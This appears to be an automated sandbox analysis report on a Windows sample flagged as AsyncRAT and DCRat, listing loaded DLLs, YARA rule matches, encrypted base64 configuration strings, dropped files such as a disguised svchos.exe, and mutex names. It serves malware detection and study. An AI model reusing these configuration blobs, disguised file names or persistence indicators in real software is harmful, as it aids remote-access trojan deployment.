Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: windows.ui.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: windowmanagementapi.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: inputhost.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: mscms.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: coloradapterclient.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: mmdevapi.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: mf.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: mfplat.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: rtworkq.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: msmpeg2vdec.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: mfperfhelper.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: dxva2.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: msvproc.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: mswsock.dll
Uses 32bit PE files
Source: rU6YAgkoAw.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: dump.pcap, type: PCAP Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 23.2.start.exe.300be20.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 23.2.start.exe.300be20.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 23.2.start.exe.300be20.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 23.2.start.exe.300be20.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 23.0.start.exe.c60000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 23.0.start.exe.c60000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000001F.00000002.2498235714.0000000004C66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000017.00000002.2376190706.0000000001406000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000017.00000002.2376656529.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000017.00000002.2376656529.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000001F.00000002.2491851943.000000000272F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000017.00000000.2318958962.0000000000C62000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000017.00000002.2376656529.000000000300B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000017.00000002.2376656529.000000000300B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: start.exe PID: 368, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: start.exe PID: 368, type: MEMORYSTR Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: svchos.exe PID: 5188, type: MEMORYSTR Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\start.exe, type: DROPPED Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Local\Temp\start.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: svchost (3).exe.15.dr, -.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: start.exe.15.dr, Settings.cs Base64 encoded string: 'lBEW3RL3+jC7Y11fUmp229gPLDajXXwBna2G0XdxWmPaTNJ+wHxPHL4OLN3cL9gLPnD7tREj0IJYIGcPZg2Shw==', 'XthVhjEtlSYvTsMZQUgqztHFapykAIgUgUue102gtp4XFA3BPLaa3mgUoIr415m95px9jJpeRVpG5+ktCbRqgFTGwyZpUEmZLtiNAUxKSu4=', 'VJ5+m/RSOw2NXS5Yl0e1a7Hv21Ta5WkuE1euKHWcmw0N8151szE+hS+BNq7itkjUaJ7MR4/T7WaLFNrqeTUuKJROepkpb2aVM2wBDVbENFw=', 'N0xsrHU+PUP7j3kba/dXrZyKa3niCxiLj4vIHm9vEVjJJe9fwLgfTF0CB270i7kDFfENjmuaEwfk08tLoH4/vw==', 'sKV4qQSBUsaQMVjiGgAoozqOBwX75CNuskQUqLNmnM22n8vmIJ6nmTaZvY24mLlFfZc0D+lyDYH2Ho9P7U1+/GqD2esQRBqjSwUhroozsY8=', 'Jbamd/wBQkzxiJ8JZLbJpxlBkxbjcTRzFvvGaLNAtvBVksBrlMQfaWdYQjRiHAzZ8O7GvJJ76VAoXEBDq3CJV44Y3SHt4N8Jfe1oF9QfPusy0F+VwafyCTbwJfkECf2Jh9S2n7uWYPVMvQ7KzBoqbp2fW1SetT7IUu4J0J/KK+vliTpATvFrYbfVCRa9n/JDrcpv0mLG49GgtIGKTh8tKl8yZbhS5cQ5wQ+lx6NHclPkyP8Ilq3McxR7t88Q7by5skJ34GGnCgPMjQloibM3+7fm44QtxjTO088njXf5z4AzrUCyNUcnyKfm3PjoePtOcQoaBP2qCuDAKoOEg9E2qB4fyiBlDkpzBTe1iJ+d1fkhV14EtaRN4RVBtknoOYH0wJdOSpOYjgyGBFw2USlZ6X7q14WKjE9eXEeRveK1XdtuwKEiL5UkRrTkXsj0cdapCqbZ2zPwfbQ3xqHSk12R13uCosWhs7Rnn/W68cJplN9ORZ6Po8CtHmiytqsRrUj/YywaGAdGBCA0Jfqmg2pWIwdbV8nBgRePg3UAZc8e4/gutrTunWbp2tRdFxbUCLyHfaVV7++7uOGjbutwuQWidFSIzDzPBI4CmTph/Jaq1X4RamXuuAW7sGy1iWACwyVjG1UYYR4gPLwUBgcYfNAnbaxHrVfVeleE9h7lEeB4ypMQ8suf8Zd9IEqW/ei0v2baLgi4bp6GTUt1y9sZsigmV1NS1oKjoCGccTwEOTn7h0KutO7Qpw5IaYHBWe+tO7r/WpA7wfrDV3BhNTqAALqt65VMrKf4406JkZlltV/gdONbiBu7YSghVwCvAaf1GBXzODMgMrdn1fSz5H9NBbjSn3z59KVEAf7AKRSXCFaOEPsYVjVmRNsfjTbF5r4nYZJXdSB+OhrStR2qlwhnZNwK5YjduMPmygUwcBSm5HLW7GSUsppELfUoJdNkr01A8lcNzHt4McjS3AE9eBkEVHeuUg=='
Source: svchos.exe.23.dr, Settings.cs Base64 encoded string: 'lBEW3RL3+jC7Y11fUmp229gPLDajXXwBna2G0XdxWmPaTNJ+wHxPHL4OLN3cL9gLPnD7tREj0IJYIGcPZg2Shw==', 'XthVhjEtlSYvTsMZQUgqztHFapykAIgUgUue102gtp4XFA3BPLaa3mgUoIr415m95px9jJpeRVpG5+ktCbRqgFTGwyZpUEmZLtiNAUxKSu4=', 'VJ5+m/RSOw2NXS5Yl0e1a7Hv21Ta5WkuE1euKHWcmw0N8151szE+hS+BNq7itkjUaJ7MR4/T7WaLFNrqeTUuKJROepkpb2aVM2wBDVbENFw=', 'N0xsrHU+PUP7j3kba/dXrZyKa3niCxiLj4vIHm9vEVjJJe9fwLgfTF0CB270i7kDFfENjmuaEwfk08tLoH4/vw==', 'sKV4qQSBUsaQMVjiGgAoozqOBwX75CNuskQUqLNmnM22n8vmIJ6nmTaZvY24mLlFfZc0D+lyDYH2Ho9P7U1+/GqD2esQRBqjSwUhroozsY8=', 'Jbamd/wBQkzxiJ8JZLbJpxlBkxbjcTRzFvvGaLNAtvBVksBrlMQfaWdYQjRiHAzZ8O7GvJJ76VAoXEBDq3CJV44Y3SHt4N8Jfe1oF9QfPusy0F+VwafyCTbwJfkECf2Jh9S2n7uWYPVMvQ7KzBoqbp2fW1SetT7IUu4J0J/KK+vliTpATvFrYbfVCRa9n/JDrcpv0mLG49GgtIGKTh8tKl8yZbhS5cQ5wQ+lx6NHclPkyP8Ilq3McxR7t88Q7by5skJ34GGnCgPMjQloibM3+7fm44QtxjTO088njXf5z4AzrUCyNUcnyKfm3PjoePtOcQoaBP2qCuDAKoOEg9E2qB4fyiBlDkpzBTe1iJ+d1fkhV14EtaRN4RVBtknoOYH0wJdOSpOYjgyGBFw2USlZ6X7q14WKjE9eXEeRveK1XdtuwKEiL5UkRrTkXsj0cdapCqbZ2zPwfbQ3xqHSk12R13uCosWhs7Rnn/W68cJplN9ORZ6Po8CtHmiytqsRrUj/YywaGAdGBCA0Jfqmg2pWIwdbV8nBgRePg3UAZc8e4/gutrTunWbp2tRdFxbUCLyHfaVV7++7uOGjbutwuQWidFSIzDzPBI4CmTph/Jaq1X4RamXuuAW7sGy1iWACwyVjG1UYYR4gPLwUBgcYfNAnbaxHrVfVeleE9h7lEeB4ypMQ8suf8Zd9IEqW/ei0v2baLgi4bp6GTUt1y9sZsigmV1NS1oKjoCGccTwEOTn7h0KutO7Qpw5IaYHBWe+tO7r/WpA7wfrDV3BhNTqAALqt65VMrKf4406JkZlltV/gdONbiBu7YSghVwCvAaf1GBXzODMgMrdn1fSz5H9NBbjSn3z59KVEAf7AKRSXCFaOEPsYVjVmRNsfjTbF5r4nYZJXdSB+OhrStR2qlwhnZNwK5YjduMPmygUwcBSm5HLW7GSUsppELfUoJdNkr01A8lcNzHt4McjS3AE9eBkEVHeuUg=='
Source: 23.2.start.exe.300be20.0.raw.unpack, Settings.cs Base64 encoded string: 'lBEW3RL3+jC7Y11fUmp229gPLDajXXwBna2G0XdxWmPaTNJ+wHxPHL4OLN3cL9gLPnD7tREj0IJYIGcPZg2Shw==', 'XthVhjEtlSYvTsMZQUgqztHFapykAIgUgUue102gtp4XFA3BPLaa3mgUoIr415m95px9jJpeRVpG5+ktCbRqgFTGwyZpUEmZLtiNAUxKSu4=', 'VJ5+m/RSOw2NXS5Yl0e1a7Hv21Ta5WkuE1euKHWcmw0N8151szE+hS+BNq7itkjUaJ7MR4/T7WaLFNrqeTUuKJROepkpb2aVM2wBDVbENFw=', 'N0xsrHU+PUP7j3kba/dXrZyKa3niCxiLj4vIHm9vEVjJJe9fwLgfTF0CB270i7kDFfENjmuaEwfk08tLoH4/vw==', 'sKV4qQSBUsaQMVjiGgAoozqOBwX75CNuskQUqLNmnM22n8vmIJ6nmTaZvY24mLlFfZc0D+lyDYH2Ho9P7U1+/GqD2esQRBqjSwUhroozsY8=', 'Jbamd/wBQkzxiJ8JZLbJpxlBkxbjcTRzFvvGaLNAtvBVksBrlMQfaWdYQjRiHAzZ8O7GvJJ76VAoXEBDq3CJV44Y3SHt4N8Jfe1oF9QfPusy0F+VwafyCTbwJfkECf2Jh9S2n7uWYPVMvQ7KzBoqbp2fW1SetT7IUu4J0J/KK+vliTpATvFrYbfVCRa9n/JDrcpv0mLG49GgtIGKTh8tKl8yZbhS5cQ5wQ+lx6NHclPkyP8Ilq3McxR7t88Q7by5skJ34GGnCgPMjQloibM3+7fm44QtxjTO088njXf5z4AzrUCyNUcnyKfm3PjoePtOcQoaBP2qCuDAKoOEg9E2qB4fyiBlDkpzBTe1iJ+d1fkhV14EtaRN4RVBtknoOYH0wJdOSpOYjgyGBFw2USlZ6X7q14WKjE9eXEeRveK1XdtuwKEiL5UkRrTkXsj0cdapCqbZ2zPwfbQ3xqHSk12R13uCosWhs7Rnn/W68cJplN9ORZ6Po8CtHmiytqsRrUj/YywaGAdGBCA0Jfqmg2pWIwdbV8nBgRePg3UAZc8e4/gutrTunWbp2tRdFxbUCLyHfaVV7++7uOGjbutwuQWidFSIzDzPBI4CmTph/Jaq1X4RamXuuAW7sGy1iWACwyVjG1UYYR4gPLwUBgcYfNAnbaxHrVfVeleE9h7lEeB4ypMQ8suf8Zd9IEqW/ei0v2baLgi4bp6GTUt1y9sZsigmV1NS1oKjoCGccTwEOTn7h0KutO7Qpw5IaYHBWe+tO7r/WpA7wfrDV3BhNTqAALqt65VMrKf4406JkZlltV/gdONbiBu7YSghVwCvAaf1GBXzODMgMrdn1fSz5H9NBbjSn3z59KVEAf7AKRSXCFaOEPsYVjVmRNsfjTbF5r4nYZJXdSB+OhrStR2qlwhnZNwK5YjduMPmygUwcBSm5HLW7GSUsppELfUoJdNkr01A8lcNzHt4McjS3AE9eBkEVHeuUg=='
Source: start.exe.15.dr, Methods.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: start.exe.15.dr, Methods.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 23.2.start.exe.300be20.0.raw.unpack, Methods.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 23.2.start.exe.300be20.0.raw.unpack, Methods.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: svchos.exe.23.dr, Methods.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: svchos.exe.23.dr, Methods.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: vk_swiftshader.dll.21.dr Binary string: ..\..\third_party\swiftshader\src\Device\Sampler.hpp
Source: vk_swiftshader.dll.21.dr Binary string: ..\..\third_party\swiftshader\src\Device\Blitter.cpp
Source: vk_swiftshader.dll.21.dr Binary string: ..\..\third_party\swiftshader\src\Device\Context.cpp%s:%d WARNING: UNSUPPORTED: VkIndexType %d
Source: vk_swiftshader.dll.21.dr Binary string: ..\..\third_party\swiftshader\src\Device\Context.cpp
Source: vk_swiftshader.dll.21.dr Binary string: ..\..\third_party\swiftshader\src\Device\Sampler.hpp%s:%d WARNING: UNSUPPORTED: VkImageViewType %d
Source: vk_swiftshader.dll.21.dr Binary string: ..\..\third_party\swiftshader\src\Device\Blitter.cpp%s:%d WARNING: UNSUPPORTED: Blitter source format %d
Source: vk_swiftshader.dll.21.dr Binary string: =..\..\third_party\swiftshader\src\Device\Renderer.cpp%s:%d WARNING: UNSUPPORTED: polygon mode: %d
Source: vk_swiftshader.dll.21.dr Binary string: =..\..\third_party\swiftshader\src\Device\Renderer.cpp
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@32/110@5/6
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rU6YAgkoAw.exe.log Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3968:120:WilError_03
Source: C:\Users\user\AppData\Roaming\svchos.exe Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3628:120:WilError_03
